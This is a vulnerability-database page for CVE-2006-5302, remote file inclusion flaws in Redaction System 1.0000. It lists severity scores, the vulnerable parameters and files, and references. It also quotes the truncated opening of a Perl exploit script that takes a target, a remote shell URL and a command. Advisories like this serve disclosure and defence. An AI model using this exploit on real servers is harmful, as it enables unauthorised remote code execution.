Published: 17/10/2006 Updated: 19/10/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 755

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Multiple PHP remote file inclusion vulnerabilities in Redaction System 1.0000 allow remote malicious users to execute arbitrary PHP code via a URL in the (1) lang_prefix parameter to (a) conn.php, (b) sesscheck.php, (c) wap/conn.php, or (d) wap/sesscheck.php, or the (2) lang parameter to (e) index.php.

Vulnerable Product	Search on Vulmon	Subscribe to Product
redaction system redaction system 1.0000

#!/usr/bin/perl use LWP::UserAgent; $target = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; $fileno = @ARGV[3]; if(!$target || !$shellsite) { usage(); } header(); if ($fileno eq 1) { $file = " connphp?lang_prefix="; } elsif ($fileno eq 2) { $file = "indexphp?lang="; } elsif ($fileno eq 3) { $file = "sesscheckphp?lan ...

CWE-94 http://redactionsystem.sourceforge.net/index.php?m=news&id=2 http://redactionsystem.sourceforge.net/index.php?m=news&id=5 http://www.securityfocus.com/bid/20499 http://secunia.com/advisories/22347 http://www.osvdb.org/29700 http://www.osvdb.org/29701 http://www.osvdb.org/29702 http://www.osvdb.org/29703 http://www.osvdb.org/29704 http://www.vupen.com/english/advisories/2006/4024 https://exchange.xforce.ibmcloud.com/vulnerabilities/29504 https://www.exploit-db.com/exploits/2534 https://nvd.nist.gov https://www.exploit-db.com/exploits/2534/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2006-5302

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect